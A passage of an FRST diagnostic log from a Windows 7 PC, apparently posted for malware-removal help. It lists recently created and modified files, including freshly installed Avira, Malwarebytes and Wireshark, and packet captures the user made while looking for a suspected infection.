R3 tmnciesc; C:\Windows\System32\DRIVERS\tmnciesc.sys [306232 2014-04-08] (Trend Micro Inc.)
R2 tmusa; C:\Windows\System32\DRIVERS\tmusa.sys [86840 2014-06-30] (Trend Micro Inc.)
U2 TMAgent; No ImagePath

==================== NetSvcs (Whitelisted) ===================

(If an item is included in the fixlist, it will be removed from the registry. Any associated file could be listed separately to be moved.)


==================== One Month Created Files and Folders ========

(If an entry is included in the fixlist, the file\folder will be moved.)

2015-03-26 13:50 - 2015-03-26 13:50 - 00000000 ____D () C:\FRST
2015-03-26 13:48 - 2015-03-26 13:48 - 00000000 _____ () C:\Users\k\defogger_reenable
2015-03-26 13:30 - 2015-03-26 13:50 - 00000000 ____D () C:\Users\k\Downloads\trojaner anleitung
2015-03-26 13:08 - 2015-03-26 13:08 - 00022928 _____ () C:\Users\k\Downloads\immer noch da die ip.pcapng
2015-03-26 12:56 - 2015-03-26 12:56 - 00001013 _____ () C:\ProgramData\Microsoft\Windows\Start Menu\Programs\FlashFXP 5.lnk
2015-03-26 12:56 - 2015-03-26 12:56 - 00001001 _____ () C:\Users\k\Desktop\FlashFXP 5.lnk
2015-03-26 12:56 - 2015-03-26 12:56 - 00000000 __HDC () C:\ProgramData\{DDE51F71-DCC9-49C9-8B29-B0C887D41F90}
2015-03-26 12:56 - 2015-03-26 12:56 - 00000000 ____D () C:\ProgramData\regid.2000-02.com.flashfxp
2015-03-26 12:56 - 2015-03-26 12:56 - 00000000 ____D () C:\Program Files\FlashFXP 5
2015-03-26 12:53 - 2015-03-26 12:55 - 00000000 __HDC () C:\ProgramData\~0
2015-03-26 12:53 - 2015-03-26 12:53 - 00000000 ____D () C:\Users\k\AppData\Roaming\FlashFXP
2015-03-26 12:50 - 2015-03-26 12:50 - 05580472 _____ (OpenSight Software LLC ) C:\Users\k\Downloads\FlashFXP51_3820_Setup.exe
2015-03-26 11:37 - 2015-03-26 13:05 - 00000000 ____D () C:\Users\k\AppData\Roaming\Wireshark
2015-03-26 11:15 - 2015-03-26 11:15 - 02204892 _____ () C:\Users\k\Downloads\nach flash fxp start.pcapng
2015-03-26 11:03 - 2015-03-26 11:03 - 00001692 _____ () C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Wireshark.lnk
2015-03-26 11:03 - 2015-03-26 11:03 - 00000000 ____D () C:\Program Files\Wireshark
2015-03-26 11:02 - 2015-03-26 11:02 - 23588136 _____ (Wireshark development team) C:\Users\k\Downloads\Wireshark-win32-1.12.4.exe
2015-03-26 09:51 - 2015-03-26 09:52 - 00000955 _____ () C:\Users\k\Desktop\welcher virus löst diese zeile aus.txt
2015-03-26 09:37 - 2015-03-26 09:35 - 00037896 _____ (Avira Operations GmbH & Co. KG) C:\Windows\system32\Drivers\avnetflt.sys
2015-03-26 09:35 - 2015-03-26 09:35 - 00001111 _____ () C:\Users\Public\Desktop\Avira.lnk
2015-03-26 09:35 - 2015-03-26 09:35 - 00000000 ____D () C:\Users\k\AppData\Roaming\Avira
2015-03-26 09:35 - 2015-03-26 09:35 - 00000000 ____D () C:\ProgramData\Package Cache
2015-03-26 09:33 - 2015-03-26 09:35 - 00000000 ____D () C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Avira
2015-03-26 09:33 - 2015-03-26 09:33 - 00002032 _____ () C:\Users\Public\Desktop\Avira Control Center.lnk
2015-03-26 09:32 - 2015-03-26 09:35 - 00000000 ____D () C:\ProgramData\Avira
2015-03-26 09:32 - 2015-03-26 09:35 - 00000000 ____D () C:\Program Files\Avira
2015-03-26 09:32 - 2015-03-17 13:02 - 00028520 _____ (Avira GmbH) C:\Windows\system32\Drivers\ssmdrv.sys
2015-03-26 09:32 - 2015-03-17 13:01 - 00136216 _____ (Avira Operations GmbH & Co. KG) C:\Windows\system32\Drivers\avipbb.sys
2015-03-26 09:32 - 2015-03-17 13:01 - 00105864 _____ (Avira Operations GmbH & Co. KG) C:\Windows\system32\Drivers\avgntflt.sys
2015-03-26 09:32 - 2015-03-17 13:01 - 00037352 _____ (Avira Operations GmbH & Co. KG) C:\Windows\system32\Drivers\avkmgr.sys
2015-03-26 09:05 - 2015-03-26 09:05 - 00000387 _____ () C:\Users\k\Downloads\boris.txt
2015-03-26 09:01 - 2015-03-25 14:46 - 00254946 _____ () C:\Users\k\Downloads\2014_10_27_HEX_780x420_DE.swf
2015-03-26 09:00 - 2015-03-26 09:00 - 00000000 ____D () C:\Users\k\AppData\Roaming\NetGear
2015-03-25 20:05 - 2015-03-26 13:42 - 00119512 _____ (Malwarebytes Corporation) C:\Windows\system32\Drivers\MBAMSwissArmy.sys
2015-03-25 20:05 - 2015-03-25 20:05 - 00001080 _____ () C:\Users\Public\Desktop\ Malwarebytes Anti-Malware .lnk
2015-03-25 20:05 - 2015-03-25 20:05 - 00000000 ____D () C:\ProgramData\Microsoft\Windows\Start Menu\Programs\ Malwarebytes Anti-Malware 
2015-03-25 20:05 - 2015-03-25 20:05 - 00000000 ____D () C:\ProgramData\Malwarebytes
2015-03-25 20:05 - 2015-03-25 20:05 - 00000000 ____D () C:\Program Files\ Malwarebytes Anti-Malware 
2015-03-25 20:05 - 2015-03-17 06:15 - 00092888 _____ (Malwarebytes Corporation) C:\Windows\system32\Drivers\mbamchameleon.sys
2015-03-25 20:05 - 2015-03-17 06:15 - 00051928 _____ (Malwarebytes Corporation) C:\Windows\system32\Drivers\mwac.sys
2015-03-25 20:05 - 2015-03-17 06:15 - 00023256 _____ (Malwarebytes Corporation) C:\Windows\system32\Drivers\mbam.sys
2015-03-25 20:03 - 2015-03-25 20:04 - 21540440 _____ (Malwarebytes Corporation ) C:\Users\k\Downloads\mbam-setup-2.1.4.1018.exe
2015-03-25 19:08 - 2015-03-25 19:08 - 00000000 ____D () C:\Users\k\Documents\ProSafe Plus Utility
2015-03-25 19:06 - 2015-03-25 19:09 - 00000000 ____D () C:\Program Files\Common Files\Adobe AIR
2015-03-25 19:06 - 2015-03-25 19:06 - 00000000 ____D () C:\Users\Default\AppData\Roaming\Macromedia
2015-03-25 19:06 - 2015-03-25 19:06 - 00000000 ____D () C:\Users\Default User\AppData\Roaming\Macromedia
2015-03-25 19:05 - 2015-03-26 11:03 - 00000000 ____D () C:\Program Files\WinPcap
2015-03-25 19:05 - 2015-03-25 19:05 - 00000000 ____D () C:\ProgramData\Microsoft\Windows\Start Menu\Programs\WinPcap
2015-03-25 19:04 - 2015-03-25 19:04 - 00002775 _____ () C:\Users\Public\Desktop\ProSafe Plus Utility.lnk
2015-03-25 19:04 - 2015-03-25 19:04 - 00000000 ____D () C:\ProgramData\Microsoft\Windows\Start Menu\Programs\NetGear
2015-03-25 19:04 - 2015-03-25 19:04 - 00000000 ____D () C:\Program Files\NetGear
2015-03-24 21:17 - 2015-03-11 04:30 - 00623616 _____ (Microsoft Corporation) C:\Windows\system32\invagent.dll
2015-03-24 21:17 - 2015-03-11 04:30 - 00534528 _____ (Microsoft Corporation) C:\Windows\system32\generaltel.dll
2015-03-24 21:17 - 2015-03-11 04:29 - 00818176 _____ (Microsoft Corporation) C:\Windows\system32\appraiser.dll
2015-03-24 21:17 - 2015-03-11 04:29 - 00327168 _____ (Microsoft Corporation) C:\Windows\system32\devinv.dll
2015-03-24 21:17 - 2015-03-11 04:29 - 00202752 _____ (Microsoft Corporation) C:\Windows\system32\aepdu.dll
2015-03-24 21:17 - 2015-03-11 04:29 - 00159744 _____ (Microsoft Corporation) C:\Windows\system32\aepic.dll
2015-03-24 21:17 - 2015-03-11 04:29 - 00026112 _____ (Microsoft Corporation) C:\Windows\system32\acmigration.dll
2015-03-24 21:17 - 2015-03-11 04:26 - 00892928 _____ (Microsoft Corporation) C:\Windows\system32\aeinv.dll
2015-03-24 13:50 - 2015-03-24 13:50 - 12207863 _____ () C:\Users\k\Downloads\d013dad9 (1).sql
2015-03-24 13:49 - 2015-03-24 13:49 - 12207863 _____ () C:\Users\k\Downloads\d013dad9.sql
2015-03-24 13:01 - 2015-03-24 13:01 - 00009858 _____ () C:\Users\k\Downloads\d0142acc nur strucktur.sql
2015-03-24 12:16 - 2015-03-24 12:17 - 52975801 _____ () C:\Users\k\Downloads\d0142acc.sql
2015-03-23 13:36 - 2015-03-26 12:26 - 00235312 _____ () C:\Windows\PFRO.log
2015-03-23 13:36 - 2015-03-26 12:26 - 00000168 _____ () C:\Windows\setupact.log
2015-03-23 13:36 - 2015-03-23 13:36 - 00000000 _____ () C:\Windows\setuperr.log
2015-03-23 11:10 - 2015-03-23 11:10 - 00000000 ____D () C:\Program Files\Mozilla Firefox
2015-03-20 18:35 - 2015-03-20 18:55 - 00000000 ____D () C:\Users\k\Downloads\Texte
2015-03-14 16:22 - 2015-03-14 16:22 - 00000999 _____ () C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Anti-Twin.lnk
2015-03-14 16:21 - 2015-03-14 16:21 - 00000000 ____D () C:\Program Files\AntiTwin
2015-03-14 16:03 - 2015-03-16 15:45 - 00000000 ____D () C:\Users\k\AppData\Roaming\TeamViewer
2015-03-10 21:55 - 2015-02-24 03:32 - 00342696 _____ (Microsoft Corporation) C:\Windows\system32\iedkcs32.dll
2015-03-10 21:55 - 2015-02-21 01:41 - 12827648 _____ (Microsoft Corporation) C:\Windows\system32\ieframe.dll
2015-03-10 21:55 - 2015-02-21 01:27 - 00418304 _____ (Microsoft Corporation) C:\Windows\system32\dxtmsft.dll
2015-03-10 21:55 - 2015-02-21 01:27 - 00285696 _____ (Microsoft Corporation) C:\Windows\system32\dxtrans.dll
2015-03-10 21:55 - 2015-02-21 01:25 - 19720192 _____ (Microsoft Corporation) C:\Windows\system32\mshtml.dll
2015-03-10 21:55 - 2015-02-21 00:32 - 00076288 _____ (Microsoft Corporation) C:\Windows\system32\mshtmled.dll
2015-03-10 21:55 - 2015-02-20 03:22 - 02724864 _____ (Microsoft Corporation) C:\Windows\system32\mshtml.tlb
2015-03-10 21:55 - 2015-02-20 03:22 - 00004096 _____ (Microsoft Corporation) C:\Windows\system32\ieetwcollectorres.dll
2015-03-10 21:55 - 2015-02-20 03:09 - 00503296 _____ (Microsoft Corporation) C:\Windows\system32\vbscript.dll
2015-03-10 21:55 - 2015-02-20 03:08 - 00062464 _____ (Microsoft Corporation) C:\Windows\system32\iesetup.dll
2015-03-10 21:55 - 2015-02-20 03:08 - 00047616 _____ (Microsoft Corporation) C:\Windows\system32\ieetwproxystub.dll
2015-03-10 21:55 - 2015-02-20 03:06 - 00064000 _____ (Microsoft Corporation) C:\Windows\system32\MshtmlDac.dll
2015-03-10 21:55 - 2015-02-20 03:03 - 02278400 _____ (Microsoft Corporation) C:\Windows\system32\iertutil.dll
2015-03-10 21:55 - 2015-02-20 03:01 - 00047104 _____ (Microsoft Corporation) C:\Windows\system32\jsproxy.dll
2015-03-10 21:55 - 2015-02-20 03:00 - 00030720 _____ (Microsoft Corporation) C:\Windows\system32\iernonce.dll
2015-03-10 21:55 - 2015-02-20 02:58 - 00478208 _____ (Microsoft Corporation) C:\Windows\system32\ieui.dll
2015-03-10 21:55 - 2015-02-20 02:56 - 00620032 _____ (Microsoft Corporation) C:\Windows\system32\jscript9diag.dll
2015-03-10 21:55 - 2015-02-20 02:56 - 00115712 _____ (Microsoft Corporation) C:\Windows\system32\ieUnatt.exe
2015-03-10 21:55 - 2015-02-20 02:56 - 00102912 _____ (Microsoft Corporation) C:\Windows\system32\ieetwcollector.exe
2015-03-10 21:55 - 2015-02-20 02:50 - 00667648 _____ (Microsoft Corporation) C:\Windows\system32\MsSpellCheckingFacility.exe
2015-03-10 21:55 - 2015-02-20 02:41 - 00060416 _____ (Microsoft Corporation) C:\Windows\system32\JavaScriptCollectionAgent.dll
2015-03-10 21:55 - 2015-02-20 02:37 - 00168960 _____ (Microsoft Corporation) C:\Windows\system32\msrating.dll
2015-03-10 21:55 - 2015-02-20 02:30 - 04300288 _____ (Microsoft Corporation) C:\Windows\system32\jscript9.dll
2015-03-10 21:55 - 2015-02-20 02:24 - 02052608 _____ (Microsoft Corporation) C:\Windows\system32\inetcpl.cpl
2015-03-10 21:55 - 2015-02-20 02:24 - 00689152 _____ (Microsoft Corporation) C:\Windows\system32\msfeeds.dll
2015-03-10 21:55 - 2015-02-20 02:24 - 00684544 _____ (Microsoft Corporation) C:\Windows\system32\ie4uinit.exe
2015-03-10 21:55 - 2015-02-20 02:23 - 01155072 _____ (Microsoft Corporation) C:\Windows\system32\mshtmlmedia.dll
2015-03-10 21:55 - 2015-02-20 02:01 - 01888256 _____ (Microsoft Corporation) C:\Windows\system32\wininet.dll
2015-03-10 21:55 - 2015-02-20 01:57 - 01311232 _____ (Microsoft Corporation) C:\Windows\system32\urlmon.dll
2015-03-10 21:55 - 2015-02-20 01:55 - 00710144 _____ (Microsoft Corporation) C:\Windows\system32\ieapfltr.dll
2015-03-10 21:49 - 2015-02-03 04:12 - 01230848 _____ (Microsoft Corporation) C:\Windows\system32\WindowsCodecs.dll
2015-03-10 21:49 - 2015-01-31 04:33 - 02744320 _____ (Microsoft Corporation) C:\Windows\system32\rdpcorets.dll
2015-03-10 21:49 - 2015-01-31 04:33 - 00013824 _____ (Microsoft Corporation) C:\Windows\system32\RdpGroupPolicyExtension.dll
2015-03-10 21:49 - 2015-01-31 01:48 - 00221184 _____ (Microsoft Corporation) C:\Windows\system32\rdpudd.dll
2015-03-10 21:48 - 2015-02-26 04:11 - 02381312 _____ (Microsoft Corporation) C:\Windows\system32\win32k.sys
2015-03-10 21:48 - 2015-02-13 06:26 - 12875264 _____ (Microsoft Corporation) C:\Windows\system32\shell32.dll
2015-03-10 21:48 - 2015-01-17 03:30 - 00828928 _____ (Microsoft Corporation) C:\Windows\system32\msctf.dll
2015-03-10 21:43 - 2015-03-06 06:15 - 00137656 _____ (Microsoft Corporation) C:\Windows\system32\Drivers\ksecpkg.sys
2015-03-10 21:43 - 2015-03-06 06:15 - 00067512 _____ (Microsoft Corporation) C:\Windows\system32\Drivers\ksecdd.sys
2015-03-10 21:43 - 2015-03-06 06:10 - 01061376 _____ (Microsoft Corporation) C:\Windows\system32\lsasrv.dll
2015-03-10 21:43 - 2015-03-06 06:10 - 00550912 _____ (Microsoft Corporation) C:\Windows\system32\kerberos.dll
2015-03-10 21:43 - 2015-03-06 06:10 - 00259584 _____ (Microsoft Corporation) C:\Windows\system32\msv1_0.dll
2015-03-10 21:43 - 2015-03-06 06:10 - 00248832 _____ (Microsoft Corporation) C:\Windows\system32\schannel.dll
2015-03-10 21:43 - 2015-03-06 06:10 - 00221184 _____ (Microsoft Corporation) C:\Windows\system32\ncrypt.dll
2015-03-10 21:43 - 2015-03-06 06:10 - 00172032 _____ (Microsoft Corporation) C:\Windows\system32\wdigest.dll
2015-03-10 21:43 - 2015-03-06 06:10 - 00100352 _____ (Microsoft Corporation) C:\Windows\system32\sspicli.dll
2015-03-10 21:43 - 2015-03-06 06:10 - 00065536 _____ (Microsoft Corporation) C:\Windows\system32\TSpkg.dll
2015-03-10 21:43 - 2015-03-06 06:10 - 00022016 _____ (Microsoft Corporation) C:\Windows\system32\secur32.dll
2015-03-10 21:43 - 2015-03-06 06:10 - 00017408 _____ (Microsoft Corporation) C:\Windows\system32\credssp.dll
2015-03-10 21:43 - 2015-03-06 06:10 - 00015872 _____ (Microsoft Corporation) C:\Windows\system32\sspisrv.dll
2015-03-10 21:43 - 2015-03-06 06:09 - 00050176 _____ (Microsoft Corporation) C:\Windows\system32\auditpol.exe
2015-03-10 21:43 - 2015-03-06 06:09 - 00022528 _____ (Microsoft Corporation) C:\Windows\system32\lsass.exe
2015-03-10 21:43 - 2015-03-06 06:07 - 00146432 _____ (Microsoft Corporation) C:\Windows\system32\msaudite.dll
2015-03-10 21:43 - 2015-03-06 06:07 - 00060416 _____ (Microsoft Corporation) C:\Windows\system32\msobjs.dll
2015-03-10 21:43 - 2015-03-06 06:06 - 00686080 _____ (Microsoft Corporation) C:\Windows\system32\adtschema.dll
2015-03-10 21:43 - 2015-02-20 05:13 - 00070656 _____ (Microsoft Corporation) C:\Windows\system32\fontsub.dll
2015-03-10 21:43 - 2015-02-20 05:13 - 00034304 _____ (Adobe Systems) C:\Windows\system32\atmlib.dll
2015-03-10 21:43 - 2015-02-20 05:13 - 00026624 _____ (Microsoft Corporation) C:\Windows\system32\lpk.dll
2015-03-10 21:43 - 2015-02-20 05:13 - 00010240 _____ (Microsoft Corporation) C:\Windows\system32\dciman32.dll
2015-03-10 21:43 - 2015-02-20 04:09 - 00299008 _____ (Adobe Systems Incorporated) C:\Windows\system32\atmfd.dll
2015-03-10 21:43 - 2015-02-04 03:54 - 00417792 _____ (Microsoft Corporation) C:\Windows\system32\WMPhoto.dll
2015-03-10 21:43 - 2015-02-03 04:16 - 03973048 _____ (Microsoft Corporation) C:\Windows\system32\ntkrnlpa.exe
2015-03-10 21:43 - 2015-02-03 04:16 - 03917760 _____ (Microsoft Corporation) C:\Windows\system32\ntoskrnl.exe
2015-03-10 21:43 - 2015-02-03 04:16 - 00078784 _____ (Microsoft Corporation) C:\Windows\system32\Drivers\mountmgr.sys
2015-03-10 21:43 - 2015-02-03 04:12 - 11411968 _____ (Microsoft Corporation) C:\Windows\system32\wmp.dll
2015-03-10 21:43 - 2015-02-03 04:12 - 03209728 _____ (Microsoft Corporation) C:\Windows\system32\mf.dll
2015-03-10 21:43 - 2015-02-03 04:12 - 01329664 _____ (Microsoft Corporation) C:\Windows\system32\quartz.dll
2015-03-10 21:43 - 2015-02-03 04:12 - 01174528 _____ (Microsoft Corporation) C:\Windows\system32\crypt32.dll
2015-03-10 21:43 - 2015-02-03 04:12 - 01005056 _____ (Microsoft Corporation) C:\Windows\system32\cryptui.dll
2015-03-10 21:43 - 2015-02-03 04:12 - 00988160 _____ (Microsoft Corporation) C:\Windows\system32\drmv2clt.dll
2015-03-10 21:43 - 2015-02-03 04:12 - 00744960 _____ (Microsoft Corporation) C:\Windows\system32\blackbox.dll
2015-03-10 21:43 - 2015-02-03 04:12 - 00617984 _____ (Microsoft Corporation) C:\Windows\system32\wmdrmsdk.dll
2015-03-10 21:43 - 2015-02-03 04:12 - 00519680 _____ (Microsoft Corporation) C:\Windows\system32\qdvd.dll
2015-03-10 21:43 - 2015-02-03 04:12 - 00504320 _____ (Microsoft Corporation) C:\Windows\system32\msscp.dll
2015-03-10 21:43 - 2015-02-03 04:12 - 00489984 _____ (Microsoft Corporation) C:\Windows\system32\evr.dll
2015-03-10 21:43 - 2015-02-03 04:12 - 00475136 _____ (Microsoft Corporation) C:\Windows\system32\audiosrv.dll
2015-03-10 21:43 - 2015-02-03 04:12 - 00442880 _____ (Microsoft Corporation) C:\Windows\system32\AUDIOKSE.dll
2015-03-10 21:43 - 2015-02-03 04:12 - 00406016 _____ (Microsoft Corporation) C:\Windows\system32\drmmgrtn.dll
2015-03-10 21:43 - 2015-02-03 04:12 - 00400896 _____ (Microsoft Corporation) C:\Windows\system32\srcore.dll
2015-03-10 21:43 - 2015-02-03 04:12 - 00374784 _____ (Microsoft Corporation) C:\Windows\system32\AudioEng.dll
2015-03-10 21:43 - 2015-02-03 04:12 - 00354816 _____ (Microsoft Corporation) C:\Windows\system32\mfplat.dll
2015-03-10 21:43 - 2015-02-03 04:12 - 00275968 _____ (Microsoft Corporation) C:\Windows\system32\EncDump.dll
2015-03-10 21:43 - 2015-02-03 04:12 - 00265216 _____ (Microsoft Corporation) C:\Windows\system32\msnetobj.dll
2015-03-10 21:43 - 2015-02-03 04:12 - 00195584 _____ (Microsoft Corporation) C:\Windows\system32\AudioSes.dll
2015-03-10 21:43 - 2015-02-03 04:12 - 00179200 _____ (Microsoft Corporation) C:\Windows\system32\wintrust.dll
2015-03-10 21:43 - 2015-02-03 04:12 - 00171520 _____ (Microsoft Corporation) C:\Windows\system32\ubpm.dll
2015-03-10 21:43 - 2015-02-03 04:12 - 00157184 _____ (Microsoft Corporation) C:\Windows\system32\pcasvc.dll
2015-03-10 21:43 - 2015-02-03 04:12 - 00143872 _____ (Microsoft Corporation) C:\Windows\system32\cryptsvc.dll
2015-03-10 21:43 - 2015-02-03 04:12 - 00103936 _____ (Microsoft Corporation) C:\Windows\system32\cryptnet.dll
2015-03-10 21:43 - 2015-02-03 04:12 - 00103424 _____ (Microsoft Corporation) C:\Windows\system32\mfps.dll
2015-03-10 21:43 - 2015-02-03 04:12 - 00081408 _____ (Microsoft Corporation) C:\Windows\system32\cryptsp.dll
2015-03-10 21:43 - 2015-02-03 04:12 - 00069632 _____ (Microsoft Corporation) C:\Windows\system32\smss.exe
2015-03-10 21:43 - 2015-02-03 04:12 - 00050688 _____ (Microsoft Corporation) C:\Windows\system32\appidapi.dll
2015-03-10 21:43 - 2015-02-03 04:12 - 00050176 _____ (Microsoft Corporation) C:\Windows\system32\setbcdlocale.dll
2015-03-10 21:43 - 2015-02-03 04:12 - 00043008 _____ (Microsoft Corporation) C:\Windows\system32\srclient.dll
2015-03-10 21:43 - 2015-02-03 04:12 - 00038912 _____ (Microsoft Corporation) C:\Windows\system32\csrsrv.dll
2015-03-10 21:43 - 2015-02-03 04:12 - 00028160 _____ (Microsoft Corporation) C:\Windows\system32\pcadm.dll
2015-03-10 21:43 - 2015-02-03 04:12 - 00027648 _____ (Microsoft Corporation) C:\Windows\system32\appidsvc.dll
2015-03-10 21:43 - 2015-02-03 04:12 - 00010752 _____ (Microsoft Corporation) C:\Windows\system32\msmmsp.dll
2015-03-10 21:43 - 2015-02-03 04:12 - 00008192 _____ (Microsoft Corporation) C:\Windows\system32\spwmp.dll
2015-03-10 21:43 - 2015-02-03 04:12 - 00004096 _____ (Microsoft Corporation) C:\Windows\system32\msdxm.ocx
2015-03-10 21:43 - 2015-02-03 04:12 - 00004096 _____ (Microsoft Corporation) C:\Windows\system32\dxmasf.dll
2015-03-10 21:43 - 2015-02-03 04:11 - 12625408 _____ (Microsoft Corporation) C:\Windows\system32\wmploc.DLL
2015-03-10 21:43 - 2015-02-03 04:11 - 00262656 _____ (Microsoft Corporation) C:\Windows\system32\rstrui.exe
2015-03-10 21:43 - 2015-02-03 04:11 - 00100864 _____ (Microsoft Corporation) C:\Windows\system32\audiodg.exe
2015-03-10 21:43 - 2015-02-03 04:11 - 00096768 _____ (Microsoft Corporation) C:\Windows\system32\appidpolicyconverter.exe
2015-03-10 21:43 - 2015-02-03 04:11 - 00050176 _____ (Microsoft Corporation) C:\Windows\system32\rrinstaller.exe
2015-03-10 21:43 - 2015-02-03 04:11 - 00023040 _____ (Microsoft Corporation) C:\Windows\system32\mfpmp.exe
2015-03-10 21:43 - 2015-02-03 04:11 - 00016896 _____ (Microsoft Corporation) C:\Windows\system32\appidcertstorecheck.exe
2015-03-10 21:43 - 2015-02-03 04:11 - 00009728 _____ (Microsoft Corporation) C:\Windows\system32\pcawrk.exe
2015-03-10 21:43 - 2015-02-03 04:11 - 00008192 _____ (Microsoft Corporation) C:\Windows\system32\pcalua.exe
2015-03-10 21:43 - 2015-02-03 04:10 - 00008704 _____ (Microsoft Corporation) C:\Windows\system32\pcaevts.dll
2015-03-10 21:43 - 2015-02-03 04:09 - 00002048 _____ (Microsoft Corporation) C:\Windows\system32\mferror.dll
2015-03-10 21:43 - 2015-02-03 04:08 - 00006656 _____ (Microsoft Corporation) C:\Windows\system32\apisetschema.dll
2015-03-10 21:43 - 2015-02-03 04:00 - 00593920 _____ (Microsoft Corporation) C:\Windows\system32\Drivers\PEAuth.sys
2015-03-10 21:43 - 2015-02-03 03:26 - 00050176 _____ (Microsoft Corporation) C:\Windows\system32\Drivers\appid.sys
2015-03-10 21:43 - 2015-01-31 00:56 - 00370488 _____ (Microsoft Corporation) C:\Windows\system32\Drivers\cng.sys
2015-03-10 21:43 - 2014-10-31 23:22 - 00521384 _____ (Microsoft Corporation) C:\Windows\system32\winload.exe
2015-03-10 21:43 - 2014-06-28 01:21 - 00455752 _____ (Microsoft Corporation) C:\Windows\system32\winresume.exe
2015-03-10 21:43 - 2014-06-28 01:21 - 00409272 _____ (Microsoft Corporation) C:\Windows\system32\ci.dll
2015-03-09 13:28 - 2015-03-09 13:28 - 00000000 _____ () C:\Users\k\Desktop\kleiner pc piept auch selbst wenn er aus ist vermutlich mainboar.txt
2015-02-27 11:59 - 2015-02-27 12:00 - 00000000 ____D () C:\Program Files\DJI Product
2015-02-27 11:59 - 2015-02-27 11:59 - 00000000 ____D () C:\ProgramData\Microsoft\Windows\Start Menu\Programs\DJI Product
2015-02-25 03:00 - 2015-01-09 00:44 - 00419936 _____ () C:\Windows\system32\locale.nls

==================== One Month Modified Files and Folders =======

(If an entry is included in the fixlist, the file\folder will be moved.)

2015-03-26 13:48 - 2014-12-12 14:10 - 00000000 ____D () C:\Users\k
2015-03-26 13:34 - 2014-12-12 14:10 - 01152762 _____ () C:\Windows\WindowsUpdate.log
2015-03-26 13:22 - 2014-12-12 17:11 - 00001098 _____ () C:\Windows\Tasks\GoogleUpdateTaskMachineUA.job
2015-03-26 13:18 - 2014-12-12 14:10 - 00000000 ____D () C:\Users\k\AppData\Local\VirtualStore
2015-03-26 13:05 - 2014-12-12 14:24 - 00000884 _____ () C:\Windows\Tasks\Adobe Flash Player Updater.job
2015-03-26 12:53 - 2014-12-12 18:36 - 00000000 ____D () C:\ProgramData\FlashFXP
2015-03-26 12:47 - 2014-12-12 17:47 - 00000000 ____D () C:\Users\k\AppData\Roaming\ICQ
2015-03-26 12:34 - 2009-07-14 05:34 - 00021856 ____H () C:\Windows\system32\7B296FB0-376B-497e-B012-9C450E1B7327-5P-1.C7483456-A289-439d-8115-601632D005A0
2015-03-26 12:34 - 2009-07-14 05:34 - 00021856 ____H () C:\Windows\system32\7B296FB0-376B-497e-B012-9C450E1B7327-5P-0.C7483456-A289-439d-8115-601632D005A0
2015-03-26 12:26 - 2014-12-12 17:11 - 00001094 _____ () C:\Windows\Tasks\GoogleUpdateTaskMachineCore.job
2015-03-26 12:26 - 2014-12-12 14:43 - 00000000 ____D () C:\ProgramData\NVIDIA
2015-03-26 12:26 - 2009-07-14 05:53 - 00000006 ____H () C:\Windows\Tasks\SA.DAT
2015-03-26 12:25 - 2014-12-14 17:14 - 00000000 ____D () C:\Windows\pss
2015-03-25 20:38 - 2014-12-12 17:47 - 00000000 ____D () C:\ProgramData\ICQ
2015-03-25 19:08 - 2014-12-12 15:49 - 00000000 ____D () C:\ProgramData\Adobe
2015-03-25 19:08 - 2014-12-12 14:24 - 00000000 ____D () C:\Users\k\AppData\Roaming\Adobe
2015-03-25 19:06 - 2014-12-12 16:52 - 00000000 ____D () C:\Program Files\Adobe
2015-03-25 19:05 - 2014-12-12 15:47 - 00000000 ____D () C:\Users\k\AppData\Local\Adobe
2015-03-25 19:04 - 2014-12-12 14:33 - 00000000 ___HD () C:\Program Files\InstallShield Installation Information
2015-03-25 08:57 - 2014-12-12 15:11 - 00000000 ____D () C:\Program Files\Mozilla Maintenance Service
2015-03-25 03:01 - 2014-12-12 17:09 - 00000000 ___SD () C:\Windows\system32\CompatTel
2015-03-25 03:01 - 2014-12-12 17:09 - 00000000 ____D () C:\Windows\system32\appraiser
2015-03-23 18:46 - 2014-12-14 17:51 - 00000000 ____D () C:\Users\k\Werbung
2015-03-23 09:29 - 2014-12-14 18:53 - 00000000 ____D () C:\Users\k\Downloads\post
2015-03-21 12:23 - 2014-12-12 14:24 - 00778928 _____ (Adobe Systems Incorporated) C:\Windows\system32\FlashPlayerApp.exe
2015-03-21 12:23 - 2014-12-12 14:24 - 00142512 _____ (Adobe Systems Incorporated) C:\Windows\system32\FlashPlayerCPLApp.cpl
2015-03-20 12:16 - 2014-12-12 16:50 - 00000000 ____D () C:\Users\k\AppData\Local\.MaxTalk
2015-03-19 15:52 - 2014-12-22 11:51 - 00000091 _____ () C:\Users\k\Desktop\test.html
2015-03-19 09:55 - 2014-12-14 18:53 - 00000810 _____ () C:\Users\k\Downloads\407382835
2015-03-19 09:43 - 2015-02-17 03:29 - 00000000 ____D () C:\Users\k\AppData\Roaming\iFunbox_UserCache
2015-03-18 19:00 - 2014-12-14 18:52 - 00000000 ____D () C:\Users\k\Downloads\alter müll
2015-03-16 12:51 - 2009-07-14 05:46 - 00001515 _____ () C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Windows Media Player.lnk
2015-03-14 16:39 - 2014-12-14 17:50 - 00000000 ____D () C:\Users\k\PersBackup
2015-03-11 12:43 - 2009-07-14 03:37 - 00000000 ____D () C:\Windows\rescache
2015-03-11 09:00 - 2009-07-14 05:33 - 00459888 _____ () C:\Windows\system32\FNTCACHE.DAT
2015-03-11 03:26 - 2009-07-14 03:37 - 00000000 ____D () C:\Windows\system32\de-DE
2015-03-11 03:11 - 2014-12-12 15:25 - 00000000 ____D () C:\Windows\system32\MRT
2015-03-11 03:08 - 2014-12-12 15:25 - 119837696 _____ (Microsoft Corporation) C:\Windows\system32\MRT.exe
2015-03-07 15:18 - 2014-12-12 15:22 - 00000000 ____D () C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Brother P-touch
2015-03-03 13:01 - 2014-12-14 17:50 - 00000000 ____D () C:\Users\k\Solar
2015-02-24 04:23 - 2014-12-12 15:04 - 00246920 ____N (Microsoft Corporation) C:\Windows\system32\MpSigStub.exe

==================== Files in the root of some directories =======

1999-03-11 18:22 - 1999-03-11 18:22 - 0099840 _____ (Symantec Corp.) C:\Program Files\Common Files\IRAABOUT.DLL
1998-12-09 03:53 - 1998-12-09 03:53 - 0048640 _____ (Symantec Corp., Peter Norton Computing Group) C:\Program Files\Common Files\IRALPTTR.DLL
1998-12-09 03:53 - 1998-12-09 03:53 - 0070144 _____ (Symantec Corp., Peter Norton Computing Group) C:\Program Files\Common Files\IRAMDMTR.DLL
